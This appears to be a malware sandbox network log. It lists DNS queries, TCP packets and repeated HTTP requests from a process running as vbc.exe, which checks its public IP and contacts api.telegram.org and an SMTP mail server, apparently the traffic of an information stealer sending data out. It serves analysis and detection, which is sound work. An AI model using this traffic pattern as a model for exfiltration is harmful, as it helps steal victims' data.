                                                                                                                                            Jan 13, 2025 13:06:00.182775974 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.183831930 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.188555002 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.219213009 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.224059105 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.224251986 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.335897923 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.337615013 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.342420101 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.777559996 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.777909040 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.784468889 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.929347038 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:00.930090904 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:00.934901953 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.463587999 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.464297056 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:02.469065905 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.617162943 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.617480040 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:02.622291088 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.786401033 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.823364973 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:02.828377962 CET58749752208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:02.828936100 CET49752587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.330447912 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.335452080 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.335604906 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.538572073 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:04.543395042 CET5360441162.159.36.2192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.543503046 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:04.548398018 CET5360441162.159.36.2192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.921638012 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:04.921943903 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:04.926809072 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.016900063 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:05.022053003 CET5360441162.159.36.2192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.022120953 CET6044153192.168.2.8162.159.36.2
                                                                                                                                            Jan 13, 2025 13:06:05.068191051 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.068413019 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:05.073183060 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.082957983 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.083229065 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:05.088025093 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.217729092 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:05.218151093 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:05.222934008 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.202047110 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.202209949 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.207081079 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.349786997 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.349939108 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.354788065 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.461673021 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.461899996 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.466681957 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.512908936 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.513314962 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.518337011 CET58749754208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.518393993 CET49754587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.614909887 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.615109921 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.619980097 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.782290936 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.782773972 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:07.787821054 CET58749753208.91.199.223192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:07.787897110 CET49753587192.168.2.8208.91.199.223
                                                                                                                                            Jan 13, 2025 13:06:09.326602936 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:09.331512928 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:09.331619978 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:09.974858046 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:09.978235960 CET60445587192.168.2.8208.91.198.143
                                                                                                                                            Jan 13, 2025 13:06:09.983536959 CET58760445208.91.198.143192.168.2.8
                                                                                                                                            Jan 13, 2025 13:06:10.130167961 CET58760445208.91.198.143192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 13, 2025 13:05:35.121440887 CET | 192.168.2.8 | 1.1.1.1 | 0x5420 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.855284929 CET | 192.168.2.8 | 1.1.1.1 | 0xe88f | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:52.807939053 CET | 192.168.2.8 | 1.1.1.1 | 0xdb41 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:59.270195007 CET | 192.168.2.8 | 1.1.1.1 | 0xf383 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:05.023104906 CET | 192.168.2.8 | 1.1.1.1 | 0xb7a2 | Standard query (0) | 18.31.95.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jan 13, 2025 13:06:09.307696104 CET | 192.168.2.8 | 1.1.1.1 | 0x5400 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 13, 2025 13:05:35.128900051 CET | 1.1.1.1 | 192.168.2.8 | 0x5420 | No error (0) | checkip.dyndns.org | checkip.dyndns.com |  | CNAME (Canonical name) | IN (0x0001) | false
Jan 13, 2025 13:05:35.128900051 CET | 1.1.1.1 | 192.168.2.8 | 0x5420 | No error (0) | checkip.dyndns.com |  | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:35.128900051 CET | 1.1.1.1 | 192.168.2.8 | 0x5420 | No error (0) | checkip.dyndns.com |  | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:35.128900051 CET | 1.1.1.1 | 192.168.2.8 | 0x5420 | No error (0) | checkip.dyndns.com |  | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:35.128900051 CET | 1.1.1.1 | 192.168.2.8 | 0x5420 | No error (0) | checkip.dyndns.com |  | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:35.128900051 CET | 1.1.1.1 | 192.168.2.8 | 0x5420 | No error (0) | checkip.dyndns.com |  | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.864368916 CET | 1.1.1.1 | 192.168.2.8 | 0xe88f | No error (0) | reallyfreegeoip.org |  | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.864368916 CET | 1.1.1.1 | 192.168.2.8 | 0xe88f | No error (0) | reallyfreegeoip.org |  | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.864368916 CET | 1.1.1.1 | 192.168.2.8 | 0xe88f | No error (0) | reallyfreegeoip.org |  | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.864368916 CET | 1.1.1.1 | 192.168.2.8 | 0xe88f | No error (0) | reallyfreegeoip.org |  | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.864368916 CET | 1.1.1.1 | 192.168.2.8 | 0xe88f | No error (0) | reallyfreegeoip.org |  | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.864368916 CET | 1.1.1.1 | 192.168.2.8 | 0xe88f | No error (0) | reallyfreegeoip.org |  | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:39.864368916 CET | 1.1.1.1 | 192.168.2.8 | 0xe88f | No error (0) | reallyfreegeoip.org |  | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:52.814594030 CET | 1.1.1.1 | 192.168.2.8 | 0xdb41 | No error (0) | api.telegram.org |  | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:59.277693033 CET | 1.1.1.1 | 192.168.2.8 | 0xf383 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:59.277693033 CET | 1.1.1.1 | 192.168.2.8 | 0xf383 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:59.277693033 CET | 1.1.1.1 | 192.168.2.8 | 0xf383 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:05:59.277693033 CET | 1.1.1.1 | 192.168.2.8 | 0xf383 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:05.030498028 CET | 1.1.1.1 | 192.168.2.8 | 0xb7a2 | Name error (3) | 18.31.95.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jan 13, 2025 13:06:09.315680981 CET | 1.1.1.1 | 192.168.2.8 | 0x5400 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:09.315680981 CET | 1.1.1.1 | 192.168.2.8 | 0x5400 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:09.315680981 CET | 1.1.1.1 | 192.168.2.8 | 0x5400 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001) | false
Jan 13, 2025 13:06:09.315680981 CET | 1.1.1.1 | 192.168.2.8 | 0x5400 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001) | false
                                                                                                                                            • reallyfreegeoip.org
                                                                                                                                            • api.telegram.org
                                                                                                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49709 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:05:35.151985884 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
Jan 13, 2025 13:05:38.745192051 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:38 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:05:38.750349998 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
Jan 13, 2025 13:05:39.806827068 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:05:40.518444061 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
Jan 13, 2025 13:05:41.813323975 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49712 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:05:38.148119926 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
Jan 13, 2025 13:05:39.734622955 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:39 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:05:39.739144087 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
Jan 13, 2025 13:05:42.033809900 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:41 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 13, 2025 13:05:42.728001118 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
Jan 13, 2025 13:05:43.021131992 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:42 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49717 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Timestamp | Bytes transferred | Direction | Data
Jan 13, 2025 13:05:42.461639881 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
Jan 13, 2025 13:05:43.287961960 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:43 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            3 | 192.168.2.8 | 49720 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:43.635449886 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:44.462898970 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            4 | 192.168.2.8 | 49721 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:43.908154011 CET | 127 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Jan 13, 2025 13:05:44.749408007 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:44 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            5 | 192.168.2.8 | 49724 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:45.054955959 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:46.057955980 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:45 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            6 | 192.168.2.8 | 49725 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:45.404594898 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:46.250083923 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:46 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            7 | 192.168.2.8 | 49728 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:46.681027889 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:47.488533974 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            8 | 192.168.2.8 | 49729 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:46.871540070 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:47.678854942 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            9 | 192.168.2.8 | 49732 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:48.122523069 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:48.993649960 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            10 | 192.168.2.8 | 49733 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:48.318278074 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:49.173690081 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:49 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            11 | 192.168.2.8 | 49738 | 132.226.8.169 | 80 | 3760 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:49.605870962 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:50.454339981 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Pragma: no-cache
                                                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                            12 | 192.168.2.8 | 49739 | 132.226.8.169 | 80 | 1532 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                            Jan 13, 2025 13:05:49.815552950 CET | 151 | OUT | GET / HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                            Host: checkip.dyndns.org
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Jan 13, 2025 13:05:50.664736032 CET | 273 | IN | HTTP/1.1 200 OK
                                                                                                                                            Date: Mon, 13 Jan 2025 12:05:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 104
                                                                                                                                            Connection: keep-alive
